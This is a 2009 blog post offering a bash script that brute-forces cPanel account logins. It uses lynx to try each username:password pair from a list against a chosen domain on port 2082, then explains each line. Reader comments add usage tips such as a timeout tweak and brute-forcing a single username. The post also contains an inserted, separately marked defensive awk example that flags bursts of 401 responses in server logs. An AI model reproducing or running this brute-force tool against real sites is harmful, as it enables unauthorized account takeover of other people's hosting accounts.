Wednesday, January 14, 2009

How to build your own brute-force tool using a Linux shell script



Hello. Have you ever tried to brute force a website login page and couldn't find the right tool?
It happens all the time, so I will explain how I did it with a Linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather than making other
# people's lives more difficult!
#############################
#  _____       _____             _   _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo ".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

Let's explain what we did:

  • #!/usr/bin/env bash
Runs the script with the bash shell that "env" finds in the current environment.

  • read site
Stores the user's input in the variable "$site", which will be the website's domain name.

  • n=`cat pass_list | wc -l`
This counts the lines in the file "pass_list", which holds the password list, and stores the count in "$n".

  • for (( i=1; i <= $n; i++));
We use the number stored in "$n" as the bound of a for loop. For example, if the file pass_list has 1000 passwords in it, the loop runs 1000 times to try all the passwords.

  • password=`sed -n "$i"p pass_list`
Here we use "sed", the stream editor, with the "-n" option and the "p" command to print one line of pass_list on each pass through the loop.
For example, in loop number 4 the variable $i has the value 4 and the sed command looks like this:
"sed -n 4p pass_list", which prints the 4th line of the password file pass_list.

  • b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
Here we use "lynx", the Linux command-line browser, as the client that connects to the target website.
We use the option "-dump" to dump the output instead of waiting for user action, "-nolist" to disable the link list feature in dumps, and "-auth=" to set the authorization ID and password for protected documents.
For example, to access the cPanel account for the website "example.com" with username "user" and password "pass", it looks like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"

So the password file pass_list should contain the usernames and passwords in this format: "username:password"

  • if [ ! -z "$b" ]; then
Here we use an if statement with the test "! -z", which is true when the value of "$b" is not an empty string. In that case we are logged in, the password is the value of the variable "$password" in the current loop iteration, and the script exits successfully; otherwise the loop continues.
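
Seen from the server side, the loop above is one HTTP Basic-auth request per line of pass_list, so it shows up in the access log as a run of 401 responses from a single client. The following is an added example, not code from the original post: it flags such runs, and a success that follows one, in constructed log lines. The combined log format, the threshold, the one-minute bucket and all addresses are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: spot the access-log trace of a
# sequential Basic-auth guessing loop (many 401s from one client).
# Assumptions: combined log format, chronological order; THRESHOLD, the
# one-minute bucket and all sample addresses are constructed for illustration.

THRESHOLD=5   # 401 responses tolerated per client per minute

# stdin: access-log lines. stdout: "<ip> <peak 401s/min> <verdict>" per flagged client.
detect_auth_bursts() {
  awk -v max="$THRESHOLD" '
    {
      ip = $1; status = $9
      minute = substr($4, 2, 17)   # "[14/Jan/2009:10:00:01" -> "14/Jan/2009:10:00"
    }
    status == 401 {
      n = ++fails[ip, minute]
      if (n > peak[ip]) peak[ip] = n
      next
    }
    # A 2xx answer after the client already exceeded the threshold suggests
    # that a guess succeeded: treat the account as compromised.
    status ~ /^2/ && (ip in peak) && peak[ip] > max { won[ip] = 1 }
    END {
      for (ip in peak)
        if (peak[ip] > max)
          print ip, peak[ip], ((ip in won) ? "success_after_burst" : "failures_only")
    }
  ' | LC_ALL=C sort
}

# Constructed sample log, embedded so the example runs offline.
sample_log() {
  for s in 01 02 03 04 05 06 07 08; do   # eight failures inside one minute
    printf '203.0.113.7 - - [14/Jan/2009:10:00:%s +0000] "GET / HTTP/1.0" 401 512\n' "$s"
  done
  printf '203.0.113.7 - user [14/Jan/2009:10:00:09 +0000] "GET / HTTP/1.0" 200 4096\n'
  for s in 11 12 13 14 15 16; do         # six failures, never a success
    printf '192.0.2.9 - - [14/Jan/2009:10:05:%s +0000] "GET / HTTP/1.0" 401 512\n' "$s"
  done
  # An ordinary user who mistypes twice and then logs in stays below the threshold.
  printf '198.51.100.4 - - [14/Jan/2009:10:07:%s +0000] "GET / HTTP/1.0" 401 512\n' 01 20
  printf '198.51.100.4 - user [14/Jan/2009:10:07:31 +0000] "GET / HTTP/1.0" 200 4096\n'
}

sample_log | detect_auth_bursts
```

A burst that straddles a minute boundary is split across two buckets, so a production rule would use a sliding window and feed the flagged addresses into lockout or rate limiting.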

That's all, folks :)
Dr.Death

15 comments:

  1. Is there any way to use it in Windows?!! I don't know how, I mean the bash script!

  2. Hello, yes, you can run it with Cygwin unix under Windows.

  3. I tried it, nice script, but for some reason lynx couldn't connect.

  4. Hi, first try to connect to the target website using lynx to troubleshoot:

    lynx "website.com"
    lynx "website.com:2082"

    Check, maybe the website doesn't run cPanel on it.

  5. Hey, how do I run it in Windows 7?

  6. What file extension should I use?

  7. Great, thanks. Really useful. I added the -read_timeout=30 parameter to the lynx command because I was getting stuck at try ~400.

    The command ends up like this:
    b=`lynx -dump -nolist -read_timeout=30 -auth="$password" ""$site":80"`

  8. How can I edit this code if I have a username and I just want to brute the pass for that username?

  9. Nice post, friend. I like the article, thanks for the article.
